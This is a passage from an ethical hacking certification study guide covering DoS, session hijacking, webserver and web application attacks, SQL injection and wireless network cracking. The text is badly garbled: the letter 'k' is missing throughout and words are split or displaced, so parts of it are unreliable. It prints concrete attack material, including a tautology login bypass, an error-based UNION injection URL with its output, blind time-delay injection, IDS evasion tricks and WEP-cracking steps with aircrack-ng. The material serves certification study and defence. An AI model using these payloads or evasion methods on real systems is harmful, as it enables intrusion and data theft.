to some botnet creation tools. When a hac er configures the botnet they can create the callbac that allows for the bots to come to a specific IRC chat channel and receive commands from the master control. This allows for a bot herder to issue commands anonymously. DDoS B otnet softw are operates li e a T rojan. It is covertly installed then it dials b to its command center. The compromised computer is now a bot. One new trend with Anonymous is to use th e Low Orbit Ion Cannon, which users can point at a website by themselves or opt in to an attac . Detection Techniques Teaching a computer the difference between legitimate traffic and attac s is con stantly being tested. Once one pattern is found, the human hac er evolves faster than the computer pro gram. The current standard is to use Abnormalities and Noticeable deviation thresholds, which do n ot always wor . Wavelet Analysis is a way of describing input by spectral components loo s for anomalies and the frequency of information to determine the normal frequency versus one during an attac . Sequential Change-Point Detection uses algorithm to isolate traffic statistics s are changed during attac s. D is initially filtered by address, port, or protocol. This d ata is compared against deviations during an attac . that ata ac

DoS/DDoS Attac Countermeasures Countermeasure strategies 1. Absorb 2. Degrade 3. Accept To absorb an attac requires the resources and planning to scale your infrastruc above the hac ers ability to generate traffic. This requires significant planning and capital. Degrading your services provided by turning off non-critical services. This allo ws your critical services the bandw idth or resources to run. If the non-critical services are being attac this may thwart the a c. tta ture


A third option is to accept the attac , turning off your outside connections, or allowing them to be down for as long as the attac continues. (Let the terrorists win? Too soon?) Mitigation and Prevention Filtering traffic is one m ethod to prevent DoS. Using Ingress and Egress filters to determine if traffic is com ing from the correct location, bloc ing the traffic if it does not m atch. How ever, it can be defeated by spoofing. Honeypots or Honeynets can be used to deflect attac s to a less critical networ section. Creating a system or networ that loo s li e your production system but does not have the s ensitive data can be difficult and time consuming. Mitigate with Load Balancing and throttling. Disable unused and insecure service s. Bloc all inbound pac ets origination from the service ports. Configure the firew to deny exter nal all Internet Control Message Protocol traffic access. Depending on how external internet access is setup organizations may be able to prevent the transmission of the fraudulently addressed pac ets at ISP level.

DoS Penetration Testing DoS testing involves finding out roughly what the minimum thresholds are for DoS attac s. Once the target is flooded with traffic, the findings about response tim are com e pared to is desired. Depending on the target and scope of the engagement, DoS pen testing may involve port flooding, email flooding, or website stress testing. Be cautious and be sure to have explicit pe rm ission to do this type of te t. s

what Module 11 Session Hijac ing Study Guide Objectives: . What is Session Hijac ing . Key Session Hijac ing Techniques Spoofing vs. Hijac ing . Session Hijac ing Process . Types of Session Hijac ing . Session Hijac ing in OSI Model . Application Level Session Hijac ing Networ Level Session Hijac ing . TCP/IP Hijac ing . Session Hijac ing Tools . Countermeasures . IPSec Architectrure . What is Session Hijac ing? Session Hijac ing is exploiting a valid computer session, this occurs when a hac er ta es over a session of communication between two computers. This is used to get access to the system and to steal data. TCP/IP is the most commonly attac ed protocol due to wea nesses in its design an d because it is used in most communication. Session Hijac ing can be difficult to counter without encryption. Compromised se ssions can allow for inform ation and identity theft in a difficult to trace m anner. M ost com puters us TCP/IP to communicate, which session hijac ing targets. All of this ma es Session Hijac in g a very big threat. Vulnerabilities that allow session hijac ing include: not having loc outs for s essions, indefinite session tim es, insecure handing of session ids, and clear text transm ission of data incl uding the session identifier. A of these vulnerabilities can lead to exploitation. ny Key Session Hijac ing Techniques Brute forcing session ids occurs when there is not a mechanism to stop an attac from trying random session ids until they are successful. This requires a lim ited field of possible session ids in order to succeed. Stealing session ids can occur whenever they are transmitted during the session. Sniffing and interception are common methods. A referrer attac is one method. Using a lin t o another site the hac er entices the victim to clic on the lin which causes the browser to send referrer URL, which contains the session ID. Calculating a session id can be easily accomplished if session ids have no rando components. Spoofing vs. Hijac ing Spoofing occurs when an attac er pretends to be a valid user. Hijac ing occurs w hen an attac er ta es over a valid user s session. Spoofing requires a hac er to be able to get crendent ials or other identifiers. H ijac ing requires a hac er to be able to find an existing session, usually requ iring sniffing er

the Session Hijac ing Process 1 S iff . n 2. Monitor, in order to predict sequence numbers 3. Session Disconnect of valid user 4. Session ID prediction to ta e over the session 5. Command injection to communicate with target system Session Hijac ing in OSI Model Networ level Hijac ing involves intercepting pac ets in a TCP or UDP session. T his requires access to networ traffic, which can be accomplished remotely by use of a Trojan or by use of pac et sniffers on a networ or device. Application level hijac ing gains control of an HTTP user session by sniffing th e session ID coo ie or pac et used to eep trac of a user s session on the website. Application Level Session Hijac ing There are multiple m ethods for gaining control of a session at the application l evel. 1. Session Sniffing 2. Predictable Session To en 3. Man in the middle attac s 4. C lient side attac s Session Sniffing Using a sniffer an attac er can capture a valid session to en and present it to the webserver. If there is not a mechanism for chec ing the validity of the to en, it can be used by the at tac er to gain access to the session. Predicting Session To ens When webservers use a predictable method for generating session ID s it is then po ssible to guess what session ID s will be and use that guess to access the server. One example of this webserver session that uses a constant bit of data and adds the date and time to that constant to create a unique session ID.

is a Man-in-the-Middle Attac s A man in the middle attac occurs when the hac er is able to place themselves in communication between a client and server. When the client and the server are not able to conf each other s identities or if they can be fooled, a m in the m an iddle attac can occur. The a ttac er ta es the communication from the client, and then passes them onto the server. The attac e r can modify or insert data after reading what the pac et contains. This can occur in HTTP trans actions by manipulating the browser or by tric ing a user into using the attac er s machine as a proxy. Client-side Attac s Client-side attac s use m ethods of getting the session ID stored in a coo ie to compromise a session. If the session ID is stored in a plaintext coo ie it could be used to give the atta c er access to the client session. A Cross-site Scripting attac uses XSS to ma e the client send or show coo ie in formation that can then be used to hijac the session. The same type of information can be gained using malicious javascript of by use of a Trojan. Once the attac er has the Session ID information it is forma tted into a javascript type request to enter the session through a web browser. Session Fixation is a technique where an attac er with a legitimate Session ID i ssued by a server tric s a victim into using that session ID to authenticate. This rem oves the attac ers ne ed to identify the session used, because they already had that information. There are three common methods used to pass this session information onto the server from the user, by the to en being in the URL argument, hiding it in a hidden form field on the w ebsite, or by placing it in a coo ie w hich is installe into the browser. Networ Level Session Hijac ing Networ level session hijac ing ta es advantage of how the networ protocol exch anges information to gain a foothold at this lower level, giving an attac er an advantage in compromi sing higher level communication. When the three- way handsha e is used the sequence numbers used by the client an d server are exchanged to give a sense of flow and order to the communication. These sequence numbers are the target of a netw level session hijac attem or pt. Sequence number Prediction attac s use this nowledge of the handsha e to send a to a irm

connection attempt to a server with the correct sequence number along with a forged source IP addre ss, which can allow a Denial of service to the true IP or close the connection w a FIN bit. ith TCP/IP Hijac ing TCP/IP hijac ing is a technique using spoofed networ pac ets to ta e over a ses between client and target. This requires that you are on the same networ as the target system, and able to spoof the ip address of the client. First, an attac er sniffs traffic to determ the sequen ine numbers in the communication. Then the hac er spoofs the IP and sends a pac et with the next se quence number. The host accepts that pac et, increments the sequence number and sends an ACK to the client. This pac et will be considered out of sequence causing the client to disregard this pac et a s valid, which allows the attac er to step in and continue the communication as if he were the victim. Source Routed pac ets can be used by an attac er to specify what path the pac et a communication should ta e. The attac er directs the pac ets to pass through a specific device for sniffing. RST Hijac ing refers to the technique of sending a forged RST pac et to a victim causing them to end the session. Once this session is closed the victim may attempt to reset the con nection with the hac er or the hac er may create a denial of service by repeating the process. Blind Hijac ing occurs when a hac er can inject data into a communication but is not able to route the communication to sniff the results. Man-in-the-Middle Attac using Pac et Sniffers W a pac et sniffer installed on a device, any data that passes through that d ith can be used in a Man in the Middle attac . Using an Address Resolution Protocol Spoof an attac er pose as another device that a client uses to connect to a host. Using forged Internet Control me ssage Protocol pac ets can also be used to direct client to server traffic through a hac er s pac et snif An example of doing this would be a hac er with a laptop in a coffee shop posing as a Wireless Acces s Point. Clients connect un now ingly to the hac er s Access Point and the hac er sniffs the traffic that then to the internet. UDP Hijac ing UDP does not deal with sequence numbers as TCP does, however if the attac er can a response bac to a client after a request before the server does an attac er can ta e ove communication. send r the evice can sion


s in


goes Session Hijac ing Tools Burp Suite is a proxy that allow for the inspection, m s odification, and inspecti on of traffic. This is the tool commonly used in our practice. Firesheep is the now defunct firefox addon that allowed anyone who tried it out to hijac sessions of popular sites such as Faceboo and Twitter. Read r more information Countermeasures All session hijac ing relies on plaintext communication. Encryption can be used to eep individual pieces of information such as user names, passwords, and session ids unreadable. Session IDs should be randomly generated on request. This handles the vulnerabil ity of a person being tric ed into using a specific, attac er generated session. Sessions should also absolute time outs so that they cannot be used after a valid user is disconnected. Networ traffic should not allow source routing of pac ets. Using Encrypted and secure protocols also thwarts session hijac ing.


have IPSec IPSEC is a set of protocols developed to secure communication at the networ lay er. It is often used in Virtual Private networ s. IPSEC provides: 1. Networ -level Peer Authentication 2. D Integrity ata 3. Data Confidentiality 4. Replay Protection 5. Data Origin Authentication IPSEC uses two modes; Transport and Tunnel. Transport mode authenticates the com munication between computers. This mode does have the ability to encrypt the actual data pa yload of the pac ets and does wor with Networ Address Translation (NAT). Tunnel mode encapsulates t he whole pac et, not just the data payload. The entire pac et is encrypted then encapsulated. Tun mode supports NAT traversal ISPEC uses Authentication Headers to ensure that the data is what it says it is (integrity) and came from where it says it cam from (Origin authentication). This also provides a counter e measure to replay attac s. The Encapsulation Security Payload is used to eep the information in a pac et c onfidential. IPSEC implementations may include AH, ESP, or both to provide for data security. SA or Security Asssociation is the third component of IPSEC. T he IPSec architec ture uses the concept of a security association as the basis for building security functions into IP. A s ecurity association is simply the bundle of algorithms and parameters (such as eys) that is being used to enc rypt and authenticate a particular flow in on direction. T e herefore, in norm bi-directional traffic, t al flows are secured by a pair of security associations.



Module 12 Hac ing Webservers Study Guide Objectives: . Webserver Threats . Web Application Attac s . Webserver Attac Tools . Countermeasures . Defending Against Webserver Attac s What is Patch Management? . Patch Management Tools . Webserver Security Tools . Webserver Pen Testing Webserver Threats Webservers exist to provide information or resources to the public. This creates a partially open door for m alicious hac ers, they can then concentrate on forcing it open the rest of way. Webservers can be vulnerable to attac s that target the w ebsite or w application itself, or t o eb attac s that allow a foothold into a target s environment. Web Application Attac s Directory Traversal Attac s exploit a vulnerability in how the server communicat es with the client to tell it to change the directory for the client. This enables a hac er to view files o utside the web directory and execute commands. This is covered in detail in the next module. HTTP Response Splitting Attac s occur when a malicious hac er inserts data into a request, li e an HTTP request that causes the server to split the response allowing the hac er to cont rol som of the return. e The vulnerability is the unvalidated input allowed by the web application on the server. Proper URL encoding and disallowing codes for a carriage return will prevent this attac . HTTP Response Hijac ing occurs when a hac er can use the technique above to send a response to a victim from the vulnerable server and then use the information the victim was tr ansmitting to receive the response of that request. Web Cache Poisoning puts a malicious website into a web server s cache as a legiti mate site. This occurs when a DNS server is vulnerable to accepting cache information from untru sources. The attac er issues a command to flush the caches and then sends a request that crea tes the malicious entry. Other webserver attac s target the encryption between the client and server, or password used to authenticate when these are vulnerable. Webserver Attac Tools M etasploit is a penetration testing tool it. T tool it allow ethical hac ers his s test systems, but can be used by malicious hac ers to run exploits against webservers. Metasploit uses n own vulnerabilities to create payloads , files that contain the code needed to successfully exploit these vulnerabilities. to



the Countermeasures Countermeasures for webserver attac s can be divided into Updates, Protocols, Ac counts, and file structure. Updates and patches for the server OS of the webserver should be applied in a re gular fashion, after testing in a non-production environment. Protocols used by the webserver should be limited to only the ones required for operation. Insecure protocols such as telnet, smtp, and ftp should not be in use on a webserver. Rem access should be encrypted or disabled. All default accounts should be disabled. All accounts that are used by the webse should have as little privilege as possible and require strong passwords. These accounts should logon auditing and have alerts for when they fail to combat dictionary and brute force password att ac s. Directory structure listing should be disabled. Any non-web files such as logs a bac ups should be removed from the server. Defending Against Webserver Attac s Defending against web server attac s requires a defense in depth approach to ens ure that all attac vectors have been guarded against. The more ports that are open and applications that are running on a web server creates more opportunities for hac ing. Every service and connectio n should be run with a least privilege account. The server itself needs to be hardened and accessed phy sically only when necessary. It should not be connected to the internet until after it has been ha rdened. If web applications are running that require a database bac end, that database s hould be on a separate server. Audit logs should also be ept on a separate server.


rver have

nd What is Patch Management? Patch Management is the process of ensuring that all systems are using the appro priate and up to date software for the hardware or software asset. Developing a good patch management system is critical to eeping systems secure. A good patch management program will follow these steps: 1. Accurately Inventory all hardware and software assets 2. Determine acceptable update window based on criticalness. 3. Test all updates adequately prior to placing in production environment 4. Install patches within update window stated in step 2. 5. Document any exceptions to the program. Be sure to test updates in a non-production environment. It is important to ensu that you have a w indow of tim for updating critical system that w not be too soon after the e s ill patch is released. Patches m ight brea critical software. Being sure that all patches are applied o n a regular basis to all system is critical. s Patch Management Tools The Microsoft Baseline Security Analyzer is an example of a free patch assessmen t tool that can chec for nown vulnerabilities caused by missing patches. Webserver Security Tools SAINT The System Administrators Integrated Networ Tool is a popular software pac age that can be used to assess and test webserver security. It is capable of fully automated scans and c an be used for specific exploitation. Hac Alert Hac Alert is a cloud based service for monitoring and vulnerability assessment. Software as a Service (SaaS) can also be tied into Web Application Firewalls. This re Webserver Pen Testing Penetration testing webservers encompasses most of the entire pen testing spectr Web servers require Footprinting, scanning, enumeration of user accounts and ports, website vulnerability assessment, OS assessment, and specific attac testing. All of these steps must be carried out and documented to perform a full penetration test. After the vulnerabilities are no exploits may be attempted to assess the extent of the vulnerability and determine what informati can be compromised. um.

wn, on

Description: .jpg Description: Module 13 Hac ing Web Applications Study Guide Objectives: . Introduction to Web Applications

. Web Application Components

. How Web Applications Wor

. Web Application Architecture

. Unvalidated Input

. Parameter/Form Tampering

. Injection Flaw s

. Hidden Field Manipulation Attac

. Cross-Site Scripting (XSS) Attac s

. Web Services Attac

. Hac ing Methodology

. Web Application Hac ing Tools

. How to Defend Against Web Application Attac s

. Web Application Security tools

. Web Application Firewalls

. Web Application Pen Testing

Description: .jpg Description: Introduction to Web Applications Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynam ically within the client Web browser. Web Application Components Web attac vectors are paths or means to attac and gain access to computer or n etwor resources. For example: Parameter manipulation, XML poisoning, client validation, server miscon figuration, web service routing issues, and cross site scripting (XSS). Unvalidated Input When an e-commerce Web site has been compromised, there is a good chance the att ac er used unvalidated input as an element of the attac . If information submitted via a W b e site is not validated before it's processed, an attac er can obtain sensitive inform ation or attac th e site. Web applications use input from HTTP requests (and occasionally files) to determ ine how to respond. Attac ers can tamper with any part of an HTTP request, including the URL, query string, headers, coo ies, form fields, and hidden fields, to try to bypass the site s security m ech anisms. Common names for common input tampering attac s include: forced browsing, command insertion, cross-site scripting(XSS), buffer overflow form string attac s, SQ injection, coo ie p s, at L oisoning, and hidden field manipulation.

Parameters should be validated against a positive specification that defines:

D type (string, integer, real, etc ) ata Allowed character set Minimum and maximum length Whether null is allowed

Whether the parameter is required or not Whether duplicates are allowed Numeric range Specific legal values (enumeration) Specific patterns (regular expressions)

Description: .jpg Description: Parameter/Form Tampering Parameter tampering occurs when the client side of the web application has sensi tive information which is then manipulated by an attac er. When the client sends the parameters of the exchange to the server, then those parameters can be modified by using a proxy. This type of attac also occurs when hidden fields are used by websites for e-co mmerce transactions. The price or quantity field is transm itted using the client, w hich m es the fie a susceptible to being altered by an attac er. This is called Hidden Field M anipulation.


Directory Traversal The goal of this attac is to order an application to access a com puter file tha t is not intended to be accessible. This attac exploits a lac of security (the softw are is acting exac tly as it is supposed to) as opposed to exploiting a bug in the code. D irectory traversal is also lim bing, and bac trac ing. now as the ../ (dot dot slash) attac , directory c n

Security Misconfigurations W server and application server configurations play a ey role in the securit y of eb a web application. These servers are responsible for serving content and invo ing applications that generate content. In addition, many application servers provide a number of services that web applica tions can use, including data storage, directory services, mail, messaging, and more. Failure to manage t he proper configuration of your servers can lead to a wide variety of security problems. Frequently, the web development group is separate from the group operating the s ite. In fact, there is often a wide gap between those who write the application and those responsible f or the operations environment. Web application security concerns often span this gap and require m embers from both sides of the project to properly ensure the security of a site s application.

Description: .jpg Description: There are a wide variety of server configuration problems that can plague the se curity of a site. These include: . Unpatched security flaws in the server software . Server softw are flaw or m s isconfigurations that perm directory listing and d it irectory traversal attac s . Unnecessary default, bac up, or sam ple files, including scripts, applications, configuration files, and web pages . Improper file and directory permissions . Unnecessary services enabled, including content management and remote administ ration . Default accounts with their default passwords . Administrative or debugging functions that are enabled or accessible . Overly informative error messages (more details in the error handling section) . Misconfigured SSL certificates and encryption settings . Use of self-signed certificates to achieve authentication and man-in-the-middl e protection . U of default certificates se . Improper authentication with external systems Some of these problems can be detected with readily available security scanning tools. Once detected, these problems can be easily exploited and result in total compromise of a websi te. Successful attac s can also result in the compromise of bac end systems including databases and cor porate networ s. Having secure software and a secure configuration are both required in order to have a secure site.

Description: .jpg Description: Injection Attac s Injection problems encompass a wide variety of issues - all mitigated in very d ifferent ways. For this reason, the m ost effective w to discuss these flaw is to note the distinct fe ay s atures which classify them as injection flaw s. The most important issue to note is that all injection problems share one thing in common - i.e., they allow for the injection of control plane data into the user-controlled data plan e. This means that the execution of the process may be altered by sending code in through legitimate da ta channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use o f some further issue to gain execution, injection problems need only for the data to be parsed. The most classing instances of this category of flaw are SQL injection and forma t string vulnerabilities.

Description: .jpg Description: SQL Injection

SQL injection ta es advantage of the syntax of SQL to inject commands that can r or modify a database, or compromise the meaning of the original query. For example, consider a web page has two fields to allow users to enter a user n and a password. The code behind the page will generate a SQL query to chec the password against the list of user names: SELECT UserList.Username



FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' If this query returns any rows, then access is granted. However, if the m aliciou s user enters a valid Username and injects some valid code ("password' OR '1'='1") in the Password fie ld, then the resulting q e w lo li eth : u ry ill o is SELECT UserList.Username

FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'password' OR '1'='1' In the example above, "Password" is assumed to be blan or some innocuous string . "'1'='1'" will always be true and many rows will be returned, thereby allowing access. The technique may be refined to allow multiple statements to run, or even to loa and run external programs. d up

Description: .jpg Description: CrossSite Scripting (XSS) Attac s Cross-site scripting (XSS) is a security exploit in w hich the attac er inserts m alicious coding into a lin that appears to be from a trustworthy source. When someone clic s on the lin , t embedded programming is submitted as part of the client's Web request and can execute on the user's computer, typically allow the attac er to steal inform ing ation. Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that ra ther than exploiting the user's trust in a site, the attac er (and his m alicious page) exploits the site' s trust in the client softw are, submitting requests that the site believes represent conscious and intentional a ctions of authenticated users. Stored XSS Attac s Stored attac s are those where the injected code is permanently stored on the ta rget servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Reflected XSS Attac s Reflected attac s are those where the injected code is reflected off the web ser ver, such as in an error message, search result, or any other response that includes some or all of the i nput sent to the server as part of the request. R eflected attac s are delivered to victim via another rout s such as in an e-mail message, or on some other web server. When a user is tric ed into clic ing on a malicious lin or subm itting a specially crafted form the injected code travels to the vulnerable , server, which reflects the attac bac to the user s browser. The browser then executes the code because it came from a "trusted" server.




Web Services Attac At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation level. While web applications typically are HTML-based, web service XML-based. Interactive users for B2C (business to consumer) transactions normally access we b applications, while web services are employed as building bloc s by other web applications for formi

s are

ng B2B (business to business) chains using the so-called SOA model.

Description: .jpg Description: alled re

W services typically present a public functional interface, capable of being c eb in a programmatic fashion, while web applications tend to deal with a richer set of features and a content-driven in most cases.

Hac ers are rapidly learning how to effectively compromise Web Services technolo gies to carry out their attac s or gain valuable footprinting inform ation. These are the tools our practice uses. . Burp Suite . W3af . OWASP

How to Defend Against Web Application Attac s Ma e sure you are familiar with these concepts.

. Validate and Sanitize Input . Safely handle different encoding schemes . Low privilege accounts for DB connection . Custom error messages so there isn t a mess of information available to average users . Validate redirects and forwards, avoid using them at all . No session data in GET and POST . Secure coo ies and do not store sensitive info in plain text . Least amount of information about services on a server as possible

Web Application Firewalls A w application firew (W eb all AF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attac s such as Cross-sit e Scripting (XSS) and SQL Injection. By customizing the rules to your application, many atta c s can be identified and bloc ed. The effort to perform this custom ization can be significant and needs t maintained as the

o be

application is m odified.

Description: .jpg Description:

Web Application Pen Testing W application penetration testing refers to a set of services used to detect v eb arious security issues w w applications and identify vulnerabilities and ris s, including: ith eb . Known vulnerabilities in COTS (Commercial Off The Shelf) applications . Technical vulnerabilities: URL m anipulation, SQ injection, cross-site scripti L bac -end authentication, password in memory, session hijac ing, buffer overflow, web serv er configuration, credential management, Clic jac ing, etc, . Business logic errors: Day-to-Day threat analysis, unauthorized logins, person al information m odification, pricelist m odification, unauthorized funds transfer, breach of cus tomer trust etc. OWASP, the Open Web Application Security Project, an open source web application security documentation project, has produced documents such as the OWASP Guide and the wi dely adopted OWASP Top 10 awareness document. ng,

Description: .jpg Description: Description: .jpg Description: Module 14 SQL Injection Study Guide Objectives: . Introduction to SQL Injection . Types of SQL Injection . SQL Injection Methodology . Common SQL Injection . Advanced SQL Injection . SQL Injection Tools . Signature Evasion Techniques . Defending Against SQL Injection

Description: .jpg Description: Introduction to SQL Injection SQL injection is the most common enemy. The vulnerability in SQL injection is th at data is not validated before it is sent to the database. SQL injections occur when untrusted data is s ent to an interpreter as part of a com and or query. The attac er s hostile data can tric the interpreter m executing unintended commands or accessing unauthorized data. This allows for a significan t bypassing of security m easures. This is a specific version of an injection attac identified in m odule 13. A successful SQL injection can lead to information theft and tampering, as well as possible Denia l of Service attac s Critical Concepts Server Side Technologies ASP.Net and relational Databases such as SQL Server, Oracle, IBM DB2 and MySQL a re all server side technologies that are susceptible to SQ injection attac s. It is not a m ter L at of specific vulnerabilities in the software but the way they are implemented to create dynam ic content without data validation. HTTP Post Request When the HTTP Post method is used to send data to the server, this string is vis ible as the HTTP address in vulnerable implementations. This data is used to create the SQL query when changed the SQL injection SQL commands and logic A common login method is to match a username and password. In a legitimate inter action these tw bits of data are loo ed up in a table, if the user s input data m o atches data found in the table the user is considered authenticated. The authentication occurs becaus e logically, the matching data creates a TRUE condition. In a vulnerable implementation, entering another TRUE condition such as 1=1 and then a to comment out the rest of the SQL request will also allow for an authentication. U sing this logic a hac er can use true conditions to then edit the table, add re cords, display records, or just delete the table.


, and


Description: .jpg Description: Informative Error Messages Error messages are used to correct issues with a database query. When these erro rs are displayed to a hac er they can be used to get important information such as tabl names, user names, passwords, and even more sensitive information. One method is to use the UNION command to combine two types of data that cannot be combined, such as a string of characters and an integer. This will produce an er ror that tells you what data could not be combined. For Example: http://duc /index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarc har value 'admin_login' to a column of data type int. /index.asp, line 5 The matching patent, '%25login%25' will be seen as %login% in SQL Server. In thi s case, we will get the first table nam that matches the criteria, "adm e in_login". Using this type of commands and patience almost any information can be uncovered

Description: .jpg Description: Types of SQL Injection Attac Stored Procedure Using stored procedures does not necessarily prevent SQL injection. The importan t thing to do is use parameters with stored procedures. If you do not use parameters, your stored pro cedures can be susceptible to SQ injection if they use unfiltered input L Union Query Using UNION to return information desired. Tautology A Tautology is a statement that is always true such as 1=1. Injecting these stat ements along with an OR logically creates a statem that is true m ing the SQL injection wor . ent a End of Line comment Using or other commenting characters to nullify legitimate code suffixed onto the attac code. Blind SQL Injection When a target does not provide informative error messages, they may still be sus ceptible to attac . Hac ing when receiving a generic or customer error message requires Blind SQL in jection techniques. This requires more time and patience to uncover information. Injecting a request with the WAITFOR DELAY command and a 10 second sleep will te ll a hac er if their command was accepted if the page then delays in its processing. BENCHMARK is ano ther such command. Blind SQL Injection wor s by as ing a series of Yes or No questions and using that information to construct an understanding of the target.

Description: .jpg Description: SQL Injection Methodology 1. Gather Information 2. D etect vulnerabilities a. This is done by injecting test queries such as


3. Preform Error based, Union based, or Blind SQL injections depending on vulner abilities and level of error reporting found. 4. Extract desired information 5. Interact with the OS a. Compromise the machine b. Execute commands or access system files 6. Move on to compromise the networ Common SQL Injection Hac ing Use SQL injection hac ing to grab passwords or hashes, create database accounts in a system, transfer an entire database to your m achine, interact with the file system or operating s ystem, or perform networ reconnaissance. Advanced SQL Injection Hac ing Advanced Enumeration Recognize that different databases require different query types. The CEH test d not require you now which commands interact with each database type. Advanced Database interaction Using more specific SQL commands it is possible to grab stored password hashes t o be bro en offline. Another common interaction is to transfer the entire database to the attac ers m achine using standard p rt 8 tra . o 0 ffic Depending on the level of permissions of the database user it is also possible t o interact with the operating system. Examples of this include the LOAD_FILE command and the xp_cmds hell, which allow a file to be loaded to the database and viewed or interact with a command line t hrough the database. oes

Description: .jpg Description: SQL Injection Tools SQLsmac SQLninja Absinthe Signature Evasion Techniques Targets may be setup with an Intrusion Detection System that compares attac s to input strings of nown attac s to detect SQL injection attac s. To bypass this, you can obscure y our attac s in multiple ways. Using various forms of encoding you can evade an IDS by not exactly matching wha t they are loo ing for. IF an IDS is set to bloc attem to inject 1=1 you can evade it by using 7=7 o pts >1. Some IDS can be evaded by encoding in HEX or using the CHAR function to represent characters. Dropping or adding whitespace [SPACE] can evade signatures as well, SQL queries do not always chec for whitespace, while an IDS usually will require an exact match. UNION SELECT a UNION SELECT will be read differently. Adding inline com ments with the /* and */ to separate commands will also confuse most IDS s. String concatenation allows for commands to be entered in a shorthand form that database can read. Concatenating these strings allows them to bypass rules in an IDS against commands themselves being entered.



the the

Description: .jpg Description: Defending Against SQL Injection Web Applications have the following vulnerabilities which require defending: The database server can run OS commands, because of this the database service a ccount needs to have minimal rights and commands that allow shell prompts and networ discovery shoul d be disabled. Error messages can be manipulated to reveal information in the database. To coun teract this error messages should be custom and suppressed whenever possible. Data must be validated before it goes to the server. Stored procedures can be us to process user input and provide a layer of protection. Data should not be concatenated if it h not been validated. Removing nown bad information may not always wor as a validation process becau se of possible encoding techniques instead sanitize by removing everything but nown good infor mation. ed as Module 15 Wireless Networ s Study Guide Objectives: . Wireless Networ s . Types of Wireless Networ s . WiFi Authentication Modes . Types of Wireless Encryption . Wireless Threats . Wireless Hac ing Methodology . Wireless Hac ing Tools . Bluetooth Hac ing . Defending Against Bluetooth Hac ing Defending Against Wireless Attac s Fi Security Tools . Wireless Pen Testing Framewor

. . Wi- Wireless Networ s W ireless networ s broadcast data so that it can be received in a local area with wires. These networ s are easier to install and scale to accommodate more users. These networ s are less secure by virtue of this greater functiona lity. Types of Wireless Networ s Wireless networ s are built on standards. These standards can be set with option s about authentication methods and encryption. Wireless Standards The 802.11x standards cover the development of the wireless spectrum for home an d business use. For the CEH you need to understand the difference in Megabit per second transmission and bandwidth used. 802.11a operates in the 5 GHz band with a maximum net data rate of 54 Mbit/s. 80 2.11b is built from the same standards and operates in the 2.4 GHz band with a maximum data rate of 11Mbit/s. 802.11g uses the 2.4GHz band at the data rate of 54 Mbit/s. 802.11n introduced Multiple In, Multiple Out (MIMO) increasing Mbit/s to 600 in the 5 GHz band. All of these standards are ma r eted under the name Wi-Fi. Bluetooth is a wireless standard for very short range transmission at a low band width. Bluetooth is utilized for low power devices such as cell phone hands free microphones, requir close range under ten meters. out


ing a WiFi Authentication Modes Open In open authentication, the signal is not encrypted and any device can authentic ate to the Access Point. Shared Key Clients use an encryption ey nown to the client and the Access Point to encryp t a challenge text sent from the access point to allow connection to the networ . Centralized A central server handles an authentication mechanism to allow clients onto the n etwor . The Access Point receives requests and as s for a response that includes an identity to pas s on to the central server such as a RADIUS server that then handles the actual authentication. Types of Wireless Encryption W EP Wired Equivalency Protocol is an older insecure encryption method. It uses small eys with flaws in im plem entation that m e it trivial to brea using tools li e aircrac -ng. a W PA Wi-Fi Protected Access corrects the flaws in WEP creating a new wireless standar d. Encryption is improved by using TKIP, Temporal Key Integrity Protocol, which creates a mechani sm for changing the ey used. WPA2 uses AES 128 bit encryption and CCMP for stronger encryption than its prede cessor. WPA2 Enterprise integrates with EAP standards for stronger authentication CCM uses 128 bit eys and 48 bit initialization vectors, which is much better t P the WEP standard used for replay detection EAP stands for Extensible Authentication Protocol which allows multiple methods for authentication such as smart cards and to ens. han

WEP Flaws WEP was implemented without public or academic review. The RC4 cipher used is de signed for one time message use, not to be used for multiple messages. This leads to the IV fra being repeated, and prone to being used in replay attac s. Tools such as aircrac allow for WEP to be crac ed with little technical nowledge. Brea ing WEP Encrypted Wireless Networ s Using aircrac -ng and a copy of Bac trac on a laptop with an injection capable wireless card is required for brea ing WEP encrypted networ s. The Wireless card is set into monitor mode. airodump-ng pac ets are captured to gain access to the IV pac ets. Aireplay-ng can be used t o do fa e authentications to generate traffic as well. Once enough pac ets are collected t ey can be crac ed using aircrac -ng, and the ey can be replayed to gain access to the networ . Brea ing WPA Encrypted Wireless Networ s With WPA-PSK a Pre Shared Key is used to begin the TKIP encryption. While the pa c ets themselves are not crac able, this Pre-Shared Key can be brute forced. With access to the AP, y can capture an authentication pac et and use offline tools such as Rainbow Tables to crac the WPA ey offline. If there are live clients in range an attac er can force that client to disconnect. When they reconnect the authentication pac can be captured and attempt to brute force against that Pair Master Key (PMK). The PMK is what is used to begin the encrypted session between the access point and the client. Wireless Threats Access Control Attac s are used against AP MAC filters or port access controls b spoofing MAC addresses or port addresses. Integrity Attac s are used by injecting data to replay a captured authentication gain access. Also these attac s are used to facilitate other attac s such as Denial of Service. Confidentiality Attac s refer to attac s intercepting data that is assum to be ed confidential. Availability Attac s prevent legitimate use of a wireless networ or resource by preventing traffic from y







reaching it. Authentication Attac s aim to steal identity of clients by crac ing logins or sn iffing credentials.

Rogue Access Points Any access point setup to loo li e a legitimate member of the networ , but is u by a hac er to accomplish any of the attac s above. sed

Evil Twin Attac Evil twin is a term for a rogue W i-Fi access point that appears to be a legitima hotspot offered on the premises, but actually has been set up by a hac er to eavesdrop on wireless comm unications among Internet surfers. An evil tw attac is the w in ireless version of the phishing scam An attac er fo . wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitima te provider. te


